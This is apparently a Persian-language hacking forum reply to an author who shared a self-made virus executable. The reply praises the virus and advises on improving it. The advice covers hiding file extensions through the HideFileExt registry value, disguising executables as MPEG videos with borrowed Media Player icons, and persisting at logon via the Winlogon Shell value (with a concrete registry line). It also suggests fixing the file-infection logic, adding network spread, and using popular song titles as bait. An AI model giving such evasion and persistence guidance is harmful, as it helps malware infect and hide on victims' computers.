Darg نوشته است:arnh نوشته است:کسی می تونه آنتی اینو بنویسه
http://ali.no.h.googlepages.com/3X.exe
این هم آنتی اون و ...
حالا تحلیل به زودی میزارم ...
خیلی عالی کار کردی همین که این یه فایل اجراییت می تونه خودش رو به شکل های مختلف تو مسیر ها کپی کنه خودش کلیه و همون طور که گفتی با آنتی ویروسی هم که خودت ساخته بودی (کاشف) قابل رد گیری نبود.
* توی خیلی از نسخه ها (نه همشون حدود 20 درصدشون) دستکاری که تو فایل اجراییت می کنی فایل رو خراب میکنه (و ویندوز موقع اجراش اررور میده). حتما این یک مورد رو اصلاح کن
* فایل های MPEG (من اسمشون رو مبزارم MPEG چون فکر می کنم میخواستی کاربر اون ها را به شکل یک فایل تصویری ببینه) وقتی پسوند exe شون مشخص میشه کار رو خرای میکنند و قضیه راحت لو میره (با وجود اینکه نام فایل ها رو طولانی انتخاب کردی) بنا براین بیاهو پسوند فایل ها رو در ویندوز مخفی کن.
کافیه داده HideFileExt در مسیر HKCU\Software\Microsoft\Windows\CurrentVersion\explorer\advanced ایجاد کنی و بهش مقدار یک بدی تا دیگه پسوند تمام فایل ها نمایش داده نشند
* در مورد فایل های MPEG یه نظر دیگه هم دارم. ایکن نمایشون خیلی تابلویه و کار رو خراب میکنه. اگه بتونی از خود آیکن فایل های mpg در ویندوز استفاده کنی عالی میشه.
یه راهش اینه که خود ایکنش رو تو فایل اصلی داشه باشی. یه راه دیگش هم اینه که وقتی فایل های MPEG رو ساختی از خود Media Player ورش داری (اون شکل ایکن توی فایل wmplayer.exe در مسیر %ProgramFiles%\Windows Media Player پیدا میشه)
در هر دو حالت مجبوری یک سری کد اضافی برای استخراج و وارد کردن یک آیکن از Resource یک فایل اجرایی, به برنامت اضافه کنی که فکر کنم حجمش کم هم نباشه. اما اگه بشه همون طور که گفتم درصد موفقیتت خیلی بالا میره (تازه هم مجبور نیستی برای دیده نشده پسوند exe فایل هات اسمشون رو بالای 20 کاراکتر انتخاب کنی)
* اجرای برنامه ها از طریق رجیستری در Run , خیلی تابلویه و هر آنتی ویروسی برای اولین جستجوش به اون مسیر ها نگاه می اندازه.
حالا یک راه بهت یاد میدم سوای Run در رجیستری تا بتونی بون زحمت ویروست در در زمان Logon اجرا کنی (شاید هم بلد باشی - همه چیز را همگان دانند ...)
کافیه فایل اجراییت رو (البته باید پسوند .com باشه تا اجرا شه) به شکل Shell بدی Explorer.exe اجرا کنی:
داده Shell رو در مسیر
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
ایجاد کن مقدارش هم باید به شکل زیر باشه
Explorer.exe "VirusNamePath"
که ViruseNamePath نام و مسیر فایل ویروسه. مثال:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Shell=Explorer.exe "D:\WINXP\smss.com"
* (این قسمت حدس و گمانه) موقع جستوجی ویروست در بین فایل ها فکر می کنم جستجو رو در درایو C:\ یا حتی درایو سیستم عامل شروع نمیشه. اگر اشتباه نکنم برنامت به دنبال Program Files می گرده تا خودش رو به فایل های اونجا (یعنی برنامه های سیستم) بچسبونه تا با اجرای هر برنامه ویروست دوباره اجرا شه. اما از اونجایی که جستجو از یک مسیر نامقول شروع مبشه احتمال خطا وجود داره. مثلا روی سیستم من به جزء Program Files سیستم چند تا Program Files دیگه هم دارم. یک نمونش هم روی درایو H ام بود که البته اونجا فقط بازی داشتم و برنامه شما لطف کردند و همه اون ها رو دست کاری کردند. اینه که فکر میکنم ویروست میتونه مرتکب اشتباه هم بشه (سوتی).
خلاصه اینکه اگر حدسیات من درست باشه باید یه تجدید نظری توی کدهای بخش جستجو و اسکن فایل هات بکنی (این موضوع توی آنتی ویروسی هم که گزاشته بودی رخ داد یعنی کاشف جستجو رو روی سیستم من از درایو H ام شروع می کرد).
* در مورد تغییراتی که در فایل های Program File میده باز هم همون مسئله شکل آیکن فایل ها که به برنامه شما تغییر میکنه باعث لو رفتن قضایا می شه.
* یه سوال هم ازت داشت: فایل های SCF یعنی - Windows Explorer Command (منظورم FOOVA(F&A)OUT OF REMIX هست), رو برای چی درست میکنی ؟
من که به نتیجه نرسیدم. گرچند که بسیار فایل های جالبی هستند (من رای اولین باری بود همچین چیزی میدیم).
* یه سوال دیگه: به همه این ها هر چی گشتم نتونستم یک مورد رو خنثی کنم. توی رجیستری یا شاخه سیستم که پیداش نکردم. با وجود اینکه همه چیز رو از کار می اندازی اما در هنگام دروباره راه اندازی ویندوز یک پیغام میده که فایل %SystemRoot%\system32\SEXY-Dir.exe رو پیدا نکردم. راستش اون فایل رو ازبین بردم اما مرجع ارجاعش رو در زمان Logon پیدا نکردم !
در آخر بازم میگم که برنامه واقعا عالی نوشتی و اگر کاری کنی که مسئله انتشارش در شبکه هم حل بشه دیگه حرف نداره راستی یه لیست فایل های MPEG آهنگ های دختران T a T u رم اضافه کن چون هم تو ایران هم توی دنیا طرف دار زیاد داره.
دیگه همین ...